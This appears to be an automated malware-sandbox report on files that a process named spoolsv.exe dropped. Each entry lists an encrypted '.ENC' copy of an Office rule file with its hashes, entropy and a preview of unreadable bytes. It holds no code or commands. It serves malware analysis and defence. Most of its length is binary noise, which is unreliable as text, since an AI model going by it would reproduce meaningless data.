                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..#..(D.\.....a[1ao.k.~J.9...b.E..<.x.]......\$.`,..?.,[.sSi_:,.~...}...v]..{&.P.r.= ....Z.o.b....".........M;....+.........:.!h....p..N...G..vZ.r..V.y=-..3V.+b....UJ..."S...e....>..}v.R.=.>i.s.n......Do.....m...3...5N@[..C...O.Nj(......:y.2.....c.]..?.R.Wi.vsO.......oL<.7..d#G..c.........WT.e..\...B.*V..%..l...Ufe...5ik....x....5........\?%..+.0SF...J..T.5..j.>L......Jn.eb....Hg........,".|..$..{b....TuM...G.....*...q...~.F......W..d...X.R>.H.!......".!.........X.bz..g.....2dK..h..X.o.p*)..t....nn.j.E...&~.Pa.......(+g.p.......y.r.[.!.).....G..I....{......n{..c.|....].PNi.~.x".|..k..8_... ......y.2...!...H...,....[..xN<.0..LavA..IV...!o....}*{...i.O)%....R(^.V......O*...8.=Oxj$sL.U.T..cv./0R.[I.2.P.q......|..K#.P"...rG..up..t....o....+.."..c.z.zJeW.t..J.[~..V...n~D...=.../.,..^!.....>.Cv"R..X.....e..`?J=...ph.T.....1o.FY..:/.O{%......B...?X...*.....V.#v.=.(.ffj.=4..u.g~..t............!.H.U

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700550v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.852944294334578
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/eQxy/VO/F1SooM+1HxT5K8wYyVBwf82vwyCS95COS7nRs8b6x6+b:/eQxbF1SooM+1HxdK7YyW8hhS95hS7nY
                                                                                                                                                                                                                                                      MD5:6B9F06F344983C99A7A09F1BC687AA3D
                                                                                                                                                                                                                                                      SHA1:C8E164C8A012F0505868CD24B323055A70695DCA
                                                                                                                                                                                                                                                      SHA-256:F2CE2B408AE9F13AA7E105C6B155AABCE8D673311A72D8272C1D6E2E9BF0B707
                                                                                                                                                                                                                                                      SHA-512:439035E4D3F86372DB098E24E7B5CC618F19E70C6BA504C50B3957DD4B1C7743B520E0C10C49C16D444945D22D8312EBCBAC90EEB91012D2B574430B41404E10
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.(.?.4................)e.w...](.Q#.c....u2F....[.tlXj....L... {.|..KE.}Ph.9..ABC.q..gPe=.~m..4....Q.+.9f...7..R.....;m...'..3I@n..8.v......!".0X3...u....&.i{......O...|....=..*...ve..5..Xd....KHr.1.#...........!.](..na...N..L[.A.:}=-...z...E}.X...?.'.#B~.....I.|.3'`...qx. .i..%.b...c....e....}..."....._@.$..VeVt...6.<...x...v....-......|].x.H....l..Mj..c`._..>\K....\.){.1zq......P..{.Sjs.E..h....En...........t......-C.......V...A.e...9....U_..Wd.w.0.@.$.}I6..o>..l....Vs.*AKm%.`........Vgk..MTk.......g.O....W........UYNK4...s..(l.D/..4...k..."v..V\......G...f..z..|.....[..n.l....k.Q.u.WOs..W..7.[/T.j.3.D...2+f!.=.....++..}..&4&.*. Q{.^h.v...J.2.-..KXd.._....Q;A...V.R.2x.8?.D-~.g9.W..+..jw...*..j...hA..;L..... .4M.L......f\..e..v.t..}.......C..I..xa.J..+.#~.Uc..{o+.i2~Oy....a@=_N.&....B,......5.W......!..$..HR.....<..!l x....... |..s....9.s.,.(y.WHW.-..=>|I.[>w...`....S..F..8!.XI.L|.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700551v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.867452047779086
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/70a9gpjmldR871H+phxuhaPTxzoNEtDlelJW+2XDvvoXU/bXh0eZZUBvvA1Pc+w:/Qa91ldNtuSxzoNGDwlJfeLN2eWHA1P8
                                                                                                                                                                                                                                                      MD5:789AA8351C9599F368D4FF9FCB92376A
                                                                                                                                                                                                                                                      SHA1:C2A76EE7E068D475F5A276EA7236FFCFFAFB045E
                                                                                                                                                                                                                                                      SHA-256:85A117BB73442472611EB2B9A20BEB80EE52D10E640EF7458723C95EE22640D6
                                                                                                                                                                                                                                                      SHA-512:0741E21DAA5D55F96147DB786EDA688A64F4E592AD3F4FB51FA5520462D164E2ED83E1A607367941D189F40D1101F1C3A3D7578C30599ECBB74D2CD9F9B50846
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...@.....s.(T.ee.jR.......S.<Q?!..h....H...x.T.c1W...y3.V...,......m........L...ea.'.....f8,+.~4qoW#Hq`.. n5..'...7...F.7.\Z...|-+...g.\....f....D....)^'....)VK.Z..3.[.3....|wM).C.d.|....?.....2.m.,....(B."?...4...*.P.....c.I.1.)W.t0.3.B`.30.....B...h.Z.W.m].(..nn....I.,.k..#...~9...H..d....Rs\T..*..&.Z.T..)..P+a...D..[k.Q".S.D..:...7.......,P.r..Q..W...|.5t$..K.{...U.d.p.....)..;..P....x....N.?.P..5|.h.. h>{5U......K.Xw....@.Q...:.x.v.%...iG.uo.,'?..{w.N3.'.C2S.........$f.O.....0......La..w..D..x...2..._.._1;e.`.+...7..+..X.L...D..m......G/.~O..gQw......w.(.G......].9I..d..r./...j.....-n.6....1..a..@..cf+.....7,..R*oUZ**o.4.>..E...x.....m.....Ky7p.{kcN...3|...P..L@..L1| 9.g.....`..j>X..6.N.]H.0...`t.....Yx.......h..P...c....6..IW ..B....}f..?.#.x......p1o..U,).r.{....V.PBzO.......m'.3.T.[.X..Y.k"Q~.....'...9V.._V....)...'_.Ofg~s.n6.!H..2.~c...7,Xc.....g.....@.`..(}....4.?...U{[..a.c.e....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700600v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.854369430390401
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/QSQsDZ/i7HPJYc76UPDeYyauwpYJ8gpfjVtGdfhi6g/ICnnL:/91hk2cjLeYyauw2J8gpLLG9hvgAaL
                                                                                                                                                                                                                                                      MD5:0E93E142F8B4CBB9A524C5A3BB1F7F5B
                                                                                                                                                                                                                                                      SHA1:54F111EA48B14933D37B90727DFE6820D84580BA
                                                                                                                                                                                                                                                      SHA-256:7980B3DC0AD9E294A81C3798F74FA1FB6D7A3ACE00B1FD450A12904E1D377F0F
                                                                                                                                                                                                                                                      SHA-512:38B08DC1A31766CE20A63061EC56DA649469FEB060E5EAA901FB0E4DD049009DF388CF714545610D03110CED060813866801B19F5071A2A6FA8262572AC46CDD
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t....Wn..@....at.8.....Z...8-...`+...K-.^=..b`.[.3..*.Q6.ty.nv..Nv.%.........,Ufx...A2.A3...~7.:2.3..'...e.......M.(......4c.%P>.\.o..D.?....%..VR{..d..J....~...4-l.....B.}j@.....?...d...6.......5........C..^...9:t...ZGA.|\@%,!...I....5gv..:.9J...l.<.7...Rx4.. .)..n.bIyM.yT..1..>KDR9C.F..;.....n.Y..+.....q.b'.>Yo\.4....!....p;gK(77,.....`E.h\N.A.9!..="~..GA.L....<r%6../?...b.....+....d...}D....8..D.0....\.k.b.I...T....[.d].....&..6....+nk.9.pAd~.i.5..~.....W/'.R.t1.9.......Q.i.i*.hM.._7..q.....U...x.v..../,..K....ia..e.#.'../..q..+..(-..b%.......)..c.*}..O)...>...W..5.^<.. ....Li.Et..x\8.....]R7]p.j...z]t..........w.<.g..>.s......sK.G."#..}..#..Lb.5S.s.m..1V........"...,.=l.. ../R.zw.[.s.>....t~:.3..#.R.......,B%..r,.K........:.#...,.G..k2.%.r.ZL.:a..XLy.l0..h...*...C9..w.I;......OI.C...o..xZ...VZ..u...8..sh......1..j..........5..W2$..7.>.F&n.H.%1...+.zU..).....5.I~Wk.e.B-......=N..8{..b&..5.Ec

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700601v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.846919867733412
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/HOnR+uepH5jhTDfYXLMjKzvC+b368XWqGt7hVwWF45rQaHqkMW:/HOR+NR5jhTDzek8By7hV74lxX
                                                                                                                                                                                                                                                      MD5:BD543EE555D041C489A02AB7BA29B4CF
                                                                                                                                                                                                                                                      SHA1:831275E8ABBEF9AB79123E6024D04F8A1D31E363
                                                                                                                                                                                                                                                      SHA-256:0523A371BA6266DF295B11C817A043B63DFC89C146B0ED707A66A317292D9602
                                                                                                                                                                                                                                                      SHA-512:840C61D4E8E9A0117F5F186D2ED8ED00F4E0C905A18EAB40855E50CC2C7ED61F7748D772E78547893E404F3F2E683C769D908F52780C5C042ADFAC43426E8248
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.....Q....1.l.6b.X.w.Yt..q<Dl...T. z...e%.t......$...G..U.x.]..Dv..IG.Y....U...8.G...9.{...w.1.e.-},o.M..5]O.N4,....VT..~....@.....d.]..a.?!.E6l......z|;k....kd\#5.|a.I*.U.r~zd..X$....7.9.....}..i04.sR...........=yI..9.g1Y.x...*^.rp.S.Q.....C.r.TrL.@|N@@....<.u...4Vz...M.a.e...6....&...o.|.bM*-.=fc...st.L......3.-F.].x....?He..#Q._...r.UR..1...c4...mJ..^......b..#......rB.QfU.F...._cn,.h...k9..:.....e..7.g......Z.....3..Gnrx..4x...p..\.....2..x.7..>.(..Q../.,QL..T.{.&(..aXa.?._..L.......;.E..FZmFj..e.P..D.......g.2.L,ae.Q...<d*}-'...D...T......_.}3.eb.u..c....3V.'.Jh. .......8..lw..Qp....F...#......)(...t.Ui:j..U...9.PQ....s..v.,#.y..$.T/...g..#...t..l.-+......2...o..G.D..Jf.F..0.....6'..s.\...R.'q.%H.Z.b...5.6...n.#..@...B..$..a.....$./.kI.....q.d.l.....]..15......Q..O#.+..M^.......#.G.;.)...$....rH..p...u......N..%..l`a..hP.]3...............S....G.MKY7...BL~../...E!..e.N.u7D,>......nYeO.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700650v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.8714543267994515
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/xCbe93cjhDfjNtaOjcOdXOvolqDWvc0hf8vgRvVzt8VN645wwdD7aL2:/0Ccj1OKdXOvolnvc0J8vYNaT6q
                                                                                                                                                                                                                                                      MD5:7454D13C3ED985C66AC74E7B4CAA2607
                                                                                                                                                                                                                                                      SHA1:0CD342F23D148594B7846DA10A9270F39A51EA34
                                                                                                                                                                                                                                                      SHA-256:110D9F93E7DEC473D06E672C7534DBD2435B8C39083D5E1866435C512210E35E
                                                                                                                                                                                                                                                      SHA-512:FB2641B81353A2CC5415BCA59392B08F3234B56B52CD2957E5B11C6587FFBCF726E131AD21C690FCB524F331CA7A8BBED2CB9659229ADF5D87E27F297C8D0128
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.........<...&.2j{.so{^..|.Y .lg.A.qF2.J..M.z....]C.%.q...u'...i.U.%.mt[..b.m/..;.J.........Go..l.CD.fD......U0!2s&.v...#.G..MYtA...=q......g%.d...p.NK...n.0w.C...t.UaQ.U.P........M....8.`.#].ljjK...!..w|.].SG.Af..........z.f\.o..*....0M{..B..6gvV.;K...[t.\...p..c...a.u-...a.!..%..~a....>Il..VA'_.sa/.3.$Z.....!.*..K.a..!....q?...9y.%S2X.u`^;.`Q..T..Xp.....A.r...?...K9...9....L..Qp@h..^.G....A.....Y.....Z...',.....m|.+...[]..a.2......;C...U....=..G.[V....emtQF.$A...]..z.....To}.^{../{.6...U./.....x.!....i.vus....qg.i.C.P1w.....~.ZR.h.uo..X.X...dof.....4.S..]+..|.~.#:F......K...y+..f....V.z[...D...7.......t.%........<<xk.....4...c#...9.0.......V..>.$.z...:..s....4. 8~...}{|.6......h.*a.'I....K......a|.....R..kQ.Q.{.P.F_...H........7...e..,f.....q.p..&@.!......c_<!.2.....Bd.0'..U....OL.j..Q9..L..m$..J..)k..NL../...Bo.q.j.Z1nl...h.?...TT.....&...r"...jo.{..t.PC..=P.I.w...X.....(.......'.[k.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700651v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.842542166833874
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/oKJnKIZ7PXZUS1YojkGnjOHAIAzoaZBlvQAX53KKVUkC25/9u0O+:/nbZzZUS/nOVWNmAJ3KV25/9V
                                                                                                                                                                                                                                                      MD5:E65F534E9FE3FF18CFB1099041963FCE
                                                                                                                                                                                                                                                      SHA1:603EE205E859731700CB7DA84745FDC6E8261965
                                                                                                                                                                                                                                                      SHA-256:5D4C190DC3DB002331254E26CACF5DD46E3AB358127B28978C948A282F905006
                                                                                                                                                                                                                                                      SHA-512:6F8CB517246A070B2C37B7218B32D2D86B73DDD052F7052442FD414FC1DE8B6F30226444489C2A1FF197A078E68B197DDF7EB1EEBB9A025FB021AE3705539EBE
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.&.:.4tC....o...\. .r0...bx.x$..`:|......~.j07x.1.V...L.R..?...M.W............I7.d.".=...t._.....u..]..n8....*..p3...?C~...h.I..N..E..O......G).....-q. R.H...<#....3....<.A..wF.fXg[....lt..[Zk...N...7..q,:>b..M6v..-.....8.2.aY.:..L.../:.......!94Wa.[...J.z..OX..\e.p......-...u.pg.G..K......y..:..al.8...N.bV.C....vJ...6...p%.QuQ.R....../....-..'D......Nk3y.|.2.x.....l.:..~&..O.l.:.l....3?.e-.G..+.......F...8.R.c{<.D.D....^. .G.-Bg....%.- N.6.n.lDzU..8.Q....a.u.|L...%..h............}:.^3.x0.O...M-LG.a[..;..SH.].W.Qq.=...z.b..0....tD,[...'g..U.OV4..~.2.r/...vH[Z..8{u..K...9...{k.......Bp..."...L.3....KF?...f.8XI..*.dF....@6'bV*.N.z. .\..x.b.H..h."..K...F8T..mT....C.c...d......A._:...2..}..........;...0..R,....7.......`..'.%Zu..... ....Ea...K)..Z.+..)ODq[*z.x...3...Y.f|......M...94.N>~{.z.A..n..}..eA......-gfZ...Mc......r.3pl.T.?.[.%N..~.s.....M.F.>WeR..(.TY......A..X1.....m.P.....2L.r.3

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700700v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.865018220529481
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/of73boKYDOaFWlTLRsdtZNtXs9RufGHeLSHly5mFtyXrLMo0pfj+j6s2V8apAji:/yuyaFHdtZUAgyEFtyXE5f2b27Au
                                                                                                                                                                                                                                                      MD5:3A92290B431894F50A0CDD806CD3F246
                                                                                                                                                                                                                                                      SHA1:4CC1143BAE70ED95BD1FFA5C834FCB97CE8ABC67
                                                                                                                                                                                                                                                      SHA-256:7B030784E43FE773301E3B7C80CA630415CDD155720198DF70C8B9BF6809DE0D
                                                                                                                                                                                                                                                      SHA-512:11227E3D5E280FC582D33B2EFB0A99C2D4EEDEFD17F2A264C04CEC3B4B20C8AFB26084CFA856FF4CC60FA66C64B26680AAF1E1F065F4DAB88E0A30F8491664E8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.$.%..UKE..R.....,.-\j.{..t..\.`.Q......K..D9y..24...._...........h..z>.z....O.D... J.F.e...#q........=W...Z.h.-........n..px.)!.....j....`..{r.b .U...^....m....t;..rkK..p.Q.p..`....4|+...../..<..b3'y.:....w.l.jU..Wt..a.w4`L...s..I.0......GGx._....*.S..e.....A.g..z...l.4....~{...Lj..a.l...g...M..g.w..z......St\$.....y.eo...<...'...8<No..3/.=.w/...mhA......u..9.p.....d..R._..u.'.(....7`ch.z.......cCM{wM.n..%...%y#R.*.}...`5F..).-...`c...........V.Bi....B.h...U....4)...YR..dQP.Z..AW1.....U.D.\p\....X..G^.]Of..(<.z..../......`..fx.KA.U%.%...e.v5+~.....C|J.g.y.k.....z!.g._...*F...H2.s.Csis....J.@.P....C....G..I..:q:.4.........U.TR....k.)...P.nE..[...&..O.5!.-...,..)P7.a..07.T+g.&..^$.:9..o.]y .....U..u..l,8.....F..q....xJ(...n?,..fl.\.@.....D.o..V...2.?..>...l#.F.........Y.%X.P(8l.Ox-.1.s...=..&c..Zz..a.....MB_..1R....h|.}...VDk2.D..'. o"...$..R...I_...~..?..9.j....5a1....R....4....*..$.m...y....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700701v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.878718844296742
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/CqVMmiURX43AO21AtkhlHSxMhSypY7o3cRnfhP4i7Et2wVs3T/8Jcyn+f:/tMmieX43AOftO4oY03DHt2wVa/8Sdf
                                                                                                                                                                                                                                                      MD5:3F8937BA351FDCE2C0ED0E6B4C013A88
                                                                                                                                                                                                                                                      SHA1:7092ACF72CD59375E75CFBC8163218BFEA88743F
                                                                                                                                                                                                                                                      SHA-256:7D30D6B6C8F62E68436FAF08913BBCD5FC8CD581FCD4FCF5DCAD78B2EDA1AEB1
                                                                                                                                                                                                                                                      SHA-512:4CB757D922ABA48E102A27E37449D63798B658821EBE289F318E79BC0B15A35844BD351843D0DF1D90CC93B9B9490DFAFE610EE4CF92182F133EA3CD5CFABFD0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...I.W...V>A['....M<...........I.......&.....[..D9..3J.~.`..[.........CZo.}1(6.............c}.......b2.@....Hj....\.M../m.^.qh....X.<.{..d.."t.....s....-.....3`.1...........nxJ\.H....E.....U;q..._}....6| S;.*..B...U.{O.#_t..d..YV,.k..r.......M.`.D.MYxu%.*+@...G...."..t.*.....r'-|0.nNT..)6.A.sn.t....q.q.o....8.;....vC.`......5x....UT......\. ..De........ ..Az...S...........84.pI.O..f.F..Nq.^.....@f.uy.a.?../......./.(3.j...2.....9.t....k7...km2.U.i.=...&..ANG.....9.C.a...^Eh....2l.......z.z.pFJ8'..+.$...~...=..V.%..oR4P88.....To.Q.$..].S.i.c.I{....l.tl....b>(...h*.oP..<..?T.Uf. ..Qa.9.1uB.......)_..Y..*..'..a.L.J.....}...2...rim.....z0I(...E.B.Dnl.V>...&.....#..C.@...I7(.Bv"..."d...CZ..r...)....#sd;.....R.?Q./7...w..s.p(T.h'...p.{...e8.......Y.HP.mS.s.D-..I...hv..`#....v....nn...Y....6Zo.......A.:.......s.~5...2].....r...5.;|.F.1*'}._2.Z.I.>[>|...6.J:....n/Kim!~.''w...9.........u..ji;x....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700750v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1392
                                                                                                                                                                                                                                                      Entropy (8bit):7.858311293985128
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/yoivPHaAcWyFK4n9ZwLG7GYgLQv5sgQZb/tnw9GkGj+IVZh/2o766W9x2liGLHt:/yB36DWyQ09ZwLG7Gh2gZLS9e+Kh/2ov
                                                                                                                                                                                                                                                      MD5:100796F8C80D3535CDC8904E818989F9
                                                                                                                                                                                                                                                      SHA1:CC35E950F3FF19567DF8BFB57F93ADE4B6411D8D
                                                                                                                                                                                                                                                      SHA-256:8F5E5F52703F848CF0F5A61C95FE1E7094722D67E653DF7C2E87CF57DAF58AC0
                                                                                                                                                                                                                                                      SHA-512:9FA157174F03A5B709F66B061B0DE5C9998EDEE7D8E655C58E678D21931AE3D1BF7A079F2ACFCAD395C0AA8130D7AE1F22BE0CE62EB57600408BC50736F96D6E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t....?..E.UND@-<{c.~...k...\....`XdH..X...?.....t_..<.w....O./.Y.....&c..B..g|Eb...~|:.X.U..{.=.!5..mjq...5...G.......9...9.A.Q..[H.j.)....b.F.S.U&...m.....O....m);..Z.^.g2CF..._........!....Mn.9h?2..W,P.*.g...U..^...L..F..{.)..[%+G8..$ }... ..,........._Pcig..eqR9....8.m8g.kd}*.k[X.ZN.....s2"......\.. .:.)k.`_.i....'-.wN !....C.`K..P...-...,Xc;.............2i..nl\ln.....6........{[.|..;.D4X....dNM>.4...*.....o...B..............b..}.D..g...%L.wGfF..U......wAW<ov..r..h...;n.J..b.^SG.i...#...t. .tJ.f...N/..3...`.\..(.._*;..~D.rIB.iF...xx.....(O(....o..oK..,.Q..:i..d.b.d#.s. ...f..\$n...)~.R....Dw..>......z.G....mc..O..W1.:`..:..'un%Ld...Ft....A.D.jE..";.6PPA...<Y...f(...G|,...2..F...E..`.&`?...>.6....D.)&e..Z.3G.nh3.3.>...... u..P_4.O.tWx....f=.f!..+d.../.e]N......b......MIp:..A:..e........W{.Z...G.y.,.<xd.e`.h...qA.~:.wM.3.?6.$"..R.Cd....)A..za.._34....Xx.P.V...r..,...\K..a.....c....[..`...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700751v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.879300395811555
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/sWiSOm46JSPZy7YeHqYPnQwN57TtznhvgyYyTKIZvnrza9xg9:/sWXOm46JSPaHBtzndgXDu9
                                                                                                                                                                                                                                                      MD5:738936ECCC07B458C79930B100BE4843
                                                                                                                                                                                                                                                      SHA1:80E2F722D3CB6283040BE8065CB27A520957DA88
                                                                                                                                                                                                                                                      SHA-256:20869638DDDB7D3E49F02C8B5C25EED6EFF542BC7FC32EA7B40FB337269002E0
                                                                                                                                                                                                                                                      SHA-512:F05A5BCB978572618B8986885BE588B0229739D9DCEAE7B2BD884FD8EA1292D4E490A1C07A920B575ACECBA45FDBD3D1F01794244E076868531B598AE8A8B9A2
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..*n!4r...1;Eb.gI..k.&..&...|g-"h..i...i..Y:\.J...-..3.%L.......B.&$.......G....EE0|<.X....F.i..."....z......\...2..J.Tn~..n,r....y...U.Z.t.tJ.&...Q.a..P8.!.p....O_.I..|.c.....c......o.t......QP.k..PE..x.....o.".....0.L....?.Y.>.!nt..`....v....e~l4.'F.gkm+..JO.i...].S_.I..bR...{.s..0....'<.e{...F.....O.u..h .<.Gd..g...a..|sLj*..].n.._T.-}.^.F.....6|...!G....u...V...a..'.pKZ.\i^.~.V..`5..Zj..$..&. ...D4.....Yz....E..p...+..p(...x9..$F...D`?48c..S.H..}.Lv.C.V...S.B...;.*s.H.......;.jV.M._......3.K~~....[.....\1B>...f.s.....`P-...t...fj....'....Mr.....#.OaWx/..$.W\>.........w.o5.L8.>$......eH^h.....V...)Z..+TK...]..L....9I..@..x.K..I............D.....0R...1...<..6.7.3.....&s.o...P....x.....t.}..&..2F......./.'m..E.E.L...t8.....h.MXP.T.s...|.N<.=.-.TD...`]...T..H..-..x.?..b.......'.......@!../.>.M.6p...#/*..a.`...z9p.0...[f.....Bp;..[..e...1._!}..L8...X_B.......HT._..-...Z.q..]..q...M..X2..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700850v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1392
                                                                                                                                                                                                                                                      Entropy (8bit):7.86223350142142
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/7cikRsJ91Sj9+P7pKc9L3pR6qiqMbh6X1Wqqr2HdogiRdL25Z7AF:/I0QcBr6qiqMbS9HdogiR92O
                                                                                                                                                                                                                                                      MD5:4767C6851463EDED65848176CF24AA34
                                                                                                                                                                                                                                                      SHA1:584F60CEEA3B1151907BD070AC2D17E2B87E07BB
                                                                                                                                                                                                                                                      SHA-256:1130912BBA71D58E26F108ACF4FFC3D4C29AC088434FA0D12EE6731C6AF56BC1
                                                                                                                                                                                                                                                      SHA-512:0C5AE33CFD6525CED75A2EC69EC42F803ABC383F21417B6BDD6DF2E6716B9BAC311C2DFEDF88A0B824E229056F99515DBED06294AB376D602A4E5CD504E85D36
                                                                                                                                                                                                                                                      Malicious:false
